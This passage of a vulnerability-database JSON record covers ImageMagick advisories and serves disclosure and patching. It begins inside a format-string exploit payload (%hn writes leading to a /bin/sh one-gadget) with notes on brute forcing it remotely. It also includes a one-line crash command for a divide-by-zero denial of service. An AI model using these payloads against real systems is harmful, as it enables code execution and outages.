c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%17995c%hn%c%c%c%c%c%c%c%c%c%65529c%hn%93659c%2176\\$hn%233c%2194\\$hhnaaaaaaaaa\n```\nThe exploit achieves remote code execution by leveraging format string vulnerabilities to perform a write-what-where attack. The payload systematically overwrites return addresses on the stack, redirecting program execution to a one-gadget ROP chain that spawns a shell with the current process privileges.\n<br>\n\n**Exploitation Process:**\n1. Format string payload corrupts stack pointers through positional parameters\n2. Multiple 2-byte writes (%hn) progressively overwrite the return address \n3. Final payload redirects execution to a one-gadget (0x00007ffff66ebc85)\n4. One-gadget executes `/bin/sh` with inherited process permissions\n<br>\n\n**Remote Exploitation Feasibility:**\nWhile this PoC demonstrates local shell execution with ASLR disabled, remote code execution is achievable in real-world scenarios through brute force attacks. When stack layout conditions are favorable, attackers can perform 1.5-byte return address brute force and 1.5-byte libc base address brute force to gain shell access.\n<br>\n\n**Important:** The numeric parameters within the format string payload are environment-dependent and may require modification for different target systems due to variations in memory layout and stack structure.\n\n**Note:** This demonstrates complete system compromise, as the attacker gains interactive shell access to the target system.\n<br>\n\n## Impact\nThis format string vulnerability enables attackers to achieve complete system compromise through arbitrary memory read/write operations and remote code execution. Attackers can access sensitive data stored in process memory, overwrite critical system structures, and execute arbitrary code with ImageMagick's privileges.\n\nThe vulnerability is particularly dangerous in web applications processing user-uploaded images and automated image processing systems. Successful exploitation can lead to privilege escalation, data exfiltration, and lateral movement within compromised networks.\n<br>\n\n## Suggested Fix\n\nTwo potential mitigation approaches:\n\n1. **Input Validation**: Add format string validation in `InterpretImageFilename` to reject filenames containing format specifiers (`%n`, `%s`, `%x`, etc.) before passing to `FormatLocaleString`\n2. **Safe Parsing**: Modify the format string processing to parse and validate each format specifier individually rather than passing the entire user-controlled string directly to `FormatLocaleString`\n<br>\n\n## Credits\n### Team Daemon Fuzz Hunters\n**Bug Hunting Master Program, HSpace/Findthegap**\n<br>\n\n**Woojin Park**\n@jin-156\n[1203kids@gmail.com](mailto:1203kids@gmail.com)\n\n**Hojun Lee**\n@leehohojune \n[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)\n\n**Youngin Won**\n@amethyst0225\n[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)\n\n**Siyeon Han**\n@hanbunny\n[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)\n\n# Additional notes from the ImageMagick team:\n\nOn many modern toolchains and OSes, format‑string exploits using %n are already mitigated or blocked by default (e.g., -Wformat-security, _FORTIFY_SOURCE, hardened libc behavior, ASLR/stack canaries). That can make exploitation impractical in typical builds so you might not be vulnerable but it would still be wise to upgrade to the most recent version. We also already provide the following mitigation:\n\nTo prevent unintended interpretation of the filename as a format string, users can explicitly disable format string parsing by defining the filename as a literal. This can be done using the following directive:\n\n- In wrappers: `filename:literal`\n- From the command line: `-define filename:literal=true`", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73277", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73285", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73275", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73233", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.7324", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73259", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73234", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73211", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73185", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73221", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.7319", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55298" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55298" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586", "reference_id": "1111586", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391097", "reference_id": "2391097", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391097" }, { "reference_url": "https://github.com/advisories/GHSA-9ccg-6pjw-x645", "reference_id": "GHSA-9ccg-6pjw-x645", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9ccg-6pjw-x645" }, { "reference_url": "https://usn.ubuntu.com/7812-1/", "reference_id": "USN-7812-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7812-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-55298", "GHSA-9ccg-6pjw-x645" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r889-wzc7-1yem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28862?format=api", "vulnerability_id": "VCID-uwj5-1fkf-7qg9", "summary": "ImageMagick affected by divide-by-zero in ThumbnailImage via montage -geometry \":\" leads to crash\n## Summary\nPassing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service.\n\n## Details\n**Root Cause**\n1. `montage -geometry \":\" ...` reaches `MagickCore/geometry.c:GetGeometry().`\n2. `StringToDouble/InterpretLocaleValue` parses `\":\"` as `0.0;` then: \nhttps://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355\n`WidthValue` (and/or `HeightValue)` is set with a zero dimension.\n3. In MagickCore/resize.c:ThumbnailImage(), the code computes:\nhttps://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629\ncausing a division by zero and immediate crash.\n\nThe issue is trivially triggerable without external input files (e.g., using `xc:white`).\n\n### Reproduction\nEnvironment\n```\nVersion: ImageMagick 7.1.2-1 (Beta) Q16-HDRI x86_64 0ba1b587b:20250812 https://imagemagick.org\nFeatures: Cipher DPC HDRI\nDelegates (built-in): bzlib fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff x xml zlib\nCompiler: clang (14.0.0)\nOS/Arch: Linux x86_64\n```\nSteps\n```\n./bin/magick montage -geometry : xc:white null:\n```\nObserved result\n```\nIOT instruction (core dumped)\n# (Environment-dependent: SIGFPE/abort may be observed.)\n```\n\n## PoC\nNo external file required; the pseudo image xc:white suffices:\n```\n./bin/magick montage -geometry : xc:white null:\n```\n\n## Impact\n- **Denial of Service:** A divide-by-zero in `ThumbnailImage()` causes immediate abnormal termination (e.g., SIGFPE/abort), crashing the ImageMagick process.\n\n\n## Suggested fix\nDefensively reject zero dimensions early in `ThumbnailImage()`:\n```c\nif ((columns == 0) || (rows == 0)) {\n (void) ThrowMagickException(exception, GetMagickModule(), OptionError,\n \"InvalidGeometry\", \"thumbnail requires non-zero dimensions: %.20gx%.20g\",\n (double) columns, (double) rows);\n return (Image *) NULL;\n}\n```\nAdditionally, consider tightening validation in `GetGeometry()` so that colon-only (and similar malformed) inputs do not yield `WidthValue/HeightValue` with zero, or are rejected outright. Variants like `\"x:\"` or `\":x\"` may also need explicit handling (maintainer confirmation requested).\n\n## Credits\n### Team Daemon Fuzz Hunters\n**Bug Hunting Master Program, HSpace/Findthegap**\n<br>\n\n**Woojin Park**\n@jin-156\n[1203kids@gmail.com](mailto:1203kids@gmail.com)\n\n**Hojun Lee**\n@leehohojune \n[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)\n\n**Youngin Won**\n@amethyst0225\n[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)\n\n**Siyeon Han**\n@hanbunny\n[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51873", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51788", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51813", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51775", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51829", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51827", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51878", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51858", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51843", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51892", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55212" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55212" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587", "reference_id": "1111587", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391088", "reference_id": "2391088", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391088" }, { "reference_url": "https://github.com/advisories/GHSA-fh55-q5pj-pxgw", "reference_id": "GHSA-fh55-q5pj-pxgw", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fh55-q5pj-pxgw" }, { "reference_url": "https://usn.ubuntu.com/7756-1/", "reference_id": "USN-7756-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7756-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-55212", "GHSA-fh55-q5pj-pxgw" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uwj5-1fkf-7qg9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21970?format=api", "vulnerability_id": "VCID-vkp6-wh22-eqap", "summary": "ImageMagick CLAHE : Unsigned underflow and division-by-zero lead to OOB pointer arithmetic and process crash (DoS)\nA single root cause in the CLAHE implementation — tile width/height becoming zero — produces two distinct but related unsafe behaviors.\nVulnerabilities exists in the `CLAHEImage()` function of ImageMagick’s `MagickCore/enhance.c`.\n\n1. Unsigned integer underflow → out-of-bounds pointer arithmetic (OOB): when `tile_info.height == 0`, the expression `tile_info.height - 1` (unsigned) wraps to a very large value; using that value in pointer arithmetic yields a huge offset and OOB memory access (leading to memory corruption, SIGSEGV, or resource exhaustion).\n2. **Division/modulus by zero**: where code performs `... / tile_info.width` or `... % tile_info.height` without re-checking for zero, causing immediate division-by-zero crashes under sanitizers or `abort` at runtime.\n\nBoth behaviors are triggered by the same invalid tile condition (e.g., CLI exact `-clahe 0x0!` or automatic tile derivation `dim >> 3 == 0` for very small images).\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62594.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62594", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02624", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0261", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04036", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03968", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03973", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03998", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03967", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0395", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0392", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03903", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03915", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62594" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7b47fe369eda90483402fcd3d78fa4167d3bb129" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296", "reference_id": "1119296", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1119296" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406644", "reference_id": "2406644", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406644" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62594", "reference_id": "CVE-2025-62594", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62594" }, { "reference_url": "https://github.com/advisories/GHSA-wpp4-vqfq-v4hp", "reference_id": "GHSA-wpp4-vqfq-v4hp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-wpp4-vqfq-v4hp" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp", "reference_id": "GHSA-wpp4-vqfq-v4hp", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-27T20:23:10Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wpp4-vqfq-v4hp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-62594", "GHSA-wpp4-vqfq-v4hp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vkp6-wh22-eqap" } ], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" }